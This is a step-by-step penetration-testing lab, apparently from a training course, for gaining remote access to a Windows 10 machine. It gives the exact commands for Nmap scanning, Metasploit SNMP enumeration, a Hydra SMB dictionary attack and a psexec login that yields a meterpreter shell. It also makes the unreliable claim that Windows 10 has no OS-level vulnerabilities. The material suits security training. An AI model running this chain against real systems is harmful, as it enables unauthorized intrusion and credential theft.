Exercise 7: Gaining Remote Access to a Windows 10 Machine

Scenario

Protocols SNMP and SMB are considered two of the most vulnerable protocols which, when running on a machine might allow attackers to gain partial/complete access to the machine. In this lab, we will be performing internal network penetration testing on subnet D machines and upon finding the machine running SNMP and SMB services, we will:

Enumerate the user accounts using the SNMP service
Collect the enumerated usernames and perform a dictionary attack using them along with a combination of passwords
Use the cracked usernames and passwords to gain shell access to the machine

The objective of this lab is to help students understand techniques such as:
i. SNMP Enumeration
ii. SMB OS Discovery
iii. Password dictionary attack using Hydra
iv. Microsoft Windows Authenticated User Code Execution

Lab Duration: 30 Minutes

Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
Type root in the Username field and click Next.
Type toor in the Password field and click Sign In.
In this lab, we will be scanning a subnet for live machines, select one machine and pentest the machine to gain access to it.
For doing a quick scan, we will do a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for pentesting.
Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
This displays all the hosts that are up in the network within a minute. In this lab, we are choosing 172.20.20.11 (Sales Department Subnet D) as our target.
Type nmap -T3 -sT -sU -A 172.20.20.11 in the command line terminal and press Enter.
By entering this syntax, we are performing a nmap scan to view all the open and filtered TCP and UDP ports on Sales Department Subnet D machine, along with services and their versions.
The scan takes around 20 minutes.
Upon completion of the scan, you will observe that ports 445 and 161 are open, along with snmp services running on the target machine as shown in the below screenshot:
The SNMP service has a common community name public, which we will be exploiting in the forthcoming tasks.
Scroll down the scan result to view the operating system running on the target machine.
From the nmap result, it is found that the operating system running on the target is Windows 10, meaning it does not have any vulnerabilities at the OS level.
Now, we shall use the snmp_login auxiliary module to see if we can log in to SNMP device using a common community name (public).
So, type msfconsole and press Enter to launch msfconsole.
Type use auxiliary/scanner/snmp/snmp_loginand press Enter to use the auxiliary scanner.
Type show options and press Enter to view the options associated with the module. We will be setting RHOSTS (target IP address) in this module to run it on the target.
Type setg rhosts 172.20.20.11 in the terminal and press Enter.
Type exploit and press Enter.
This will perform a brute force attack on the SNMP community name and upon finding the name, it will login to it as shown in the screenshot below:
Type use auxiliary/scanner/snmp/snmp_enumand press Enter.

The snmp_enum module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community name used is "public", using which we logged in to the target machine in the previous step.
Type exploit and press Enter.
This will enumerate the target machine and list down information including User accounts, System information, Network information, Network interfaces, etc.
Now, we need to note down the enumerated usernames into a text file.
Minimize the msfconsole command line terminal.
Launch a new command line terminal, type touch Usernames.txt, and press Enter.
This creates a new text file named Usernames.txtin the home folder.
Minimise the command line terminal.
Go to the home folder and open Usernames.txt. Enter the usernames that were enumerated in Task 14.
You will be using this file along with Passwords.txt file in hydra and perform a dictionary attack to see if we are able to crack any user credentials.
Now, we shall use hydra to perform an SMB dictionary attack. For this, we will be using the Usernames.txt file located in the home (root) folder and Passwords.txt file located in the /root/Wordlists folder.
Maximize the command line terminal where you created the text file, type hydra -L /root/Usernames.txt -P /root/Wordlists/Passwords.txt 172.20.20.11 smb and press Enter. This will initiate the dictionary attack on the target machine (Sales Department Subnet D) as shown in the screenshot below:
Hydra performs a dictionary attack on the target machine and displays the cracked user credentials as shown in the screenshot:
Upon running an Nmap scan in Task 5, it was observed that port 3389 was closed, meaning RDP service is disabled on the target machine.
So, in order to access the machine, we will be using the Metasploit psexec module and gain meterpreter access.
Maximize the msfconsole terminal which you minimized in Task 14.
Type use exploit/windows/smb/psexec in the msfconsole and press Enter.
To view the options that need to be set, type show options and press Enter.
This displays the options associated with the module.
We need to set the rhost, smbuser and smbpassoptions in the module.
Issue the following commands in the console:
1. set rhost 172.20.20.11
2. set smbuser Admin
3. set smbpass test@123
Now type exploit and press Enter. The smbpass exploit uses the specified credentials on 172.20.20.11 (Windows 10) machine and gains a meterpreter shell, giving us access to the machine.
Thus, we made use of the vulnerable services running on the Windows 10 machine to gain unauthorized access to it.